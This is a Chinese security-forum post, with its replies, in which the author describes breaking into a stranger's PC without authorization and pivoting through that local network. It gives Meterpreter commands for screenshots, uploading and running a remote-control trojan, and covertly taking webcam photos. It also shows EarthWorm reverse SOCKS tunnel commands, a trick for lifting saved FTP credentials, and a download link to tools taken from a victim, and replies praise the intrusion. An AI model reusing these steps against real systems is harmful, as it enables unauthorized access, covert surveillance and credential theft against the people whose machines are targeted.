用户
搜索
  • TA的每日心情

    2018-3-2 07:59
  • 签到天数: 8 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    30

    主题

    293

    帖子

    4049

    魔法币
    收听
    0
    粉丝
    119
    注册时间
    2017-4-15

    i春秋认证春秋文阁i春秋签约作者

    发表于 2018-3-19 20:46:39 631130352
    本帖最后由 jasonx 于 2018-3-20 18:26 编辑

    前言:前几天看到某个微信卖小电影的,然后通过套路拿到拿到对方电脑控制权以后,对他内网进行了一次漫游,特地给各位大佬分享下过程。

    另外各位表哥,如果你感觉文章还不错,动动你的手指,在文章的底部帮我点赞,谢谢。^_^

    **0x01 我是如何拿到控制权的?**
    这个问题我以后也许会说出来,但是目前不能说,因为影响太大了,通过这种手段攻破的电脑,基本都是骗子,BC,还有搞灰黑产的。
    因为利用这个骚路子,让我看到了那些搞灰黑产的各种套路深啊。

    **0x02 先看看微信卖小电影的**
    通过msf反弹拿到的,我们在msf下输入screenshot可以对他进行截屏,并发送到我们的/root目录下

    0.jpg


    然后为了方便控制,用下面的命令上传远控到他电脑上,并运行。
    upload m.exe c:\\windows\\m.exe
    shell
    c:\windows\mr.exe

    上线以后我们先看看内网情况。
    ipconfig可以查看他本机的IP。

    1.jpg


    继续输入arp -a 查看他内网的其他电脑。
    发现存在好多台电脑。

    2.jpg


    通过远控的文件管理功能可以看到,这家伙电脑里面到处都存了各种 不可描述.mp4
    各位表哥先别留邮箱,我真的没下载他的小电影....真的没下...没下..ヾ(゚∀゚ゞ)

    3.jpg 4.jpg
    5.jpg


    **0x03 反弹代理撸内网**
    通过远控上传ew.exe
    然后在本地执行:ew.exe -s rcsocks -l 1008 -e 888
    说明:监听888端口,把接收到的数据转到本地的1008端口。

    6.jpg


    在目标上执行ew.exe -s rssocks -d 10.10.10.10 -e 888
    说明:开启sockes 并反弹到ip地址为10.10.10.10 端口为888
    反弹代理成功以后,本地会出现rssocks cmd_socket ok!

    7.jpg


    现在打开我们的SocksCap64,新建一个代理。
    ip为127.0.0.1端口为1008,配置好了以后,点击保存。
    现在我们把需要走代理的工具都放到SocksCap64里面。

    8.jpg


    现在我们扫描下他的内网
    内网挨个打一发,发现了不得了的事情了。
    打下的第一台电脑截屏如下,看到这么多QQ,一看就知道不正常了。

    q2.jpg


    上远控继续翻他文件

    不用说了,有各种骗人的话术,还有通过远控发现他在骗人,证明这TMD就是个专业搞诈骗的。
    这里科普下:骗子基本都会有很多套话术,他和你聊天的时候,基本都是一条一条复制黏贴的,最后直到对方上当。

    q3.jpg


    我们在kali里面用命令webcam_list查看下他是否有摄像头。
    图中可以看到,有摄像头。

    sq.jpg


    继续输入webcam_snap -i 1 -v fales可以实现不开闪光灯偷偷利用他摄像头拍照,并发送到我们kali的/root目录下。
    不过你会发现,摄像头被东西挡住了,太TM狡猾了。

    q1.jpg


    又继续在内网撸了几台,大多数都是BC的。

    **0x04 有意思的来了**
    最后撸到一台,dir查看他桌面文件的时候,发现了一些扫描软件,你没猜错,这是个大黑阔。(o゚▽゚)o  

    hack.png


    还是老套路,上传远控并运行。
    然后通过远控的文件管理翻下他文件,不得了..不得了,各种CMS的exp。

    hack2.png


    顺便看看大黑阔的工具....

    hack3.jpg


    远控监视大黑阔电脑屏幕看看...
    大黑阔看到这贴不要打我,我真的是不小心进来的...ヾ(●´∀`●)

    hack4.png


    翻文件的时候发现一个ftp软件,突然灵机一动......{:6_176:}
    很多ftp软件都会保存你的用户名、密码、ip等等,方便你下次连接,但是这些配置信息一般都是在ftp软件的目录下的。

    那么我们只要下载他的ftp软件所有文件下来.....
    下载完以后,我们打开ftp看看,在站点列表里面有十几个ftp,登陆上去一看。
    好家伙,全是BC站.....

    ftp.jpg

    打包了部分大黑阔电脑上下载的工具,密码在文章底部【点赞】回复可见。

    注意了:工具是否有后门我没测试过,只是随手打包了上来,安全性请自行测试,如果你不知道你在干什么的话请不要下载。
    链接:https://pan.baidu.com/s/11azFaSRmAsQNQUgOgXFGLA
    密码:wkhs

    另外各位表哥,如果你感觉文章还不错,动动你的手指,在文章的底部帮我点赞,谢谢。^_^

    总结:我只能说一句“牛逼了”一个局域网内的人基本都是搞灰黑色产的,内网撸了一遍,基本上所有电脑都没杀软,其中有几台装有某某管家,但是注入dll的时候,竟然连警告都没有......起码人家某数字杀毒还会报毒。


    评分

    参与人数 10积分 +60 魔法币 +80 收起 理由
    sdjie + 3 感谢你的分享,i春秋论坛有你更精彩!.
    青玄 + 3 大哥 我拜师
    凉风有信 + 50 + 30 表格老牛逼了,我要拜师
    Veng + 3 哈哈,我的电脑也是没什么补丁的,只会攻不.
    wyysec + 5 欢迎分析讨论交流,i春秋论坛有你更精彩!.
    kabeo + 5 鼓励转贴优秀软件安全工具和文档!.
    DYBOY + 5 欢迎分析讨论交流,i春秋论坛有你更精彩!.
    Hex + 5
    onls辜釉 + 10 + 20 表哥牛逼
    dusty11 + 1 厉害了我的哥!!学习一波!!

    查看全部评分

    本帖被以下淘专辑推荐:

    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式
    使用道具 举报 回复
    dusty11 发表于 2018-3-19 23:36
    那个,大哥,
    "在目标上执行ew.exe -s rssocks -d 10.10.10.10 -e 888
    说明:开启sockes 并反弹到ip地址为10. ...

    Earthworm工具网址:http://rootkiter.com/EarthWorm
    EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用
    使用道具 举报 回复
    看的时候就好奇,全程操作难道都不报毒?原来都没有杀软。我想问个题外问题,我用某葵远控一台电脑(比我这里网快很多),所以趁没人用的时候下东西,然后每次都是隔段时间去现场拷贝一次,有什么方法能通过网络直接传回我这里?有的话是什么?以及能否突破我这的带宽峰值?看到某葵有个什么文件的功能,不过收费
    使用道具 举报 回复



    想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichu0000000qiu杜绝这种方式,所以水水的回复一下
    使用道具 举报 回复


    想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichu0000000qiu杜绝这种方式,所以水水的回复一下
    使用道具 举报 回复
    发表于 2018-12-25 11:35:47

    想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichu0000000qiu杜绝这种方式,所以水水的回复一下
    使用道具 举报 回复
    发表于 2018-3-19 20:59:24
    厉害了。。。。想学话术,能分享下么
    使用道具 举报 回复
    发表于 2018-3-19 21:06:53
    牛逼..
    大佬技术好 讲得的细致
    使用道具 举报 回复
    发表于 2018-3-19 21:17:01
    谢谢分享
    使用道具 举报 回复
    发表于 2018-3-19 21:24:54
    厉害厉害
    使用道具 举报 回复
    发表于 2018-3-19 21:40:40
    哇,真的强。。。
    使用道具 举报 回复
    发表于 2018-3-19 21:40:51
    都有什么好东西啊  
    使用道具 举报 回复
    发表于 2018-3-19 21:55:52
    666666666666可以啊
    使用道具 举报 回复
    发表于 2018-3-19 22:12:41
    dahekuo.6666
    使用道具 举报 回复
    发表于 2018-3-19 22:15:06
    我想问下你的smf是内网的还是外网的,要怎么才能反弹
    使用道具 举报 回复
    发表于 2018-3-19 22:24:05
    xtaxt 发表于 2018-3-19 22:15
    我想问下你的smf是内网的还是外网的,要怎么才能反弹

    我的msf是内网的,你可以在你路由器上做端口映射。或者直接开启dmz,ip指向你的kali就行。
    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    使用道具 举报 回复
    huangpan110 i春秋-核心白帽 i春秋第十五军总参谋长兼 核心白帽 春秋游侠 春秋文阁 楚 积极活跃奖 白帽高手
    12#
    发表于 2018-3-19 22:46:44
    我就想知道你有没有下小电影
    时人不识凌云木,直到凌云始到高
    使用道具 举报 回复
    发表于 2018-3-19 22:48:00
    本帖最后由 jasonx 于 2018-3-19 22:52 编辑
    纯白的小白 发表于 2018-3-19 22:44
    看的时候就好奇,全程操作难道都不报毒?原来都没有杀软。我想问个题外问题,我用某葵远控一台电脑(比我这 ...

    放个马儿不是挺好?但是要突破你的带宽峰值那是没办法的。
    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    使用道具 举报 回复
    发表于 2018-3-19 22:48:36
    huangpan110 发表于 2018-3-19 22:46
    我就想知道你有没有下小电影

    你猜? 哈哈哈哈嗝
    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册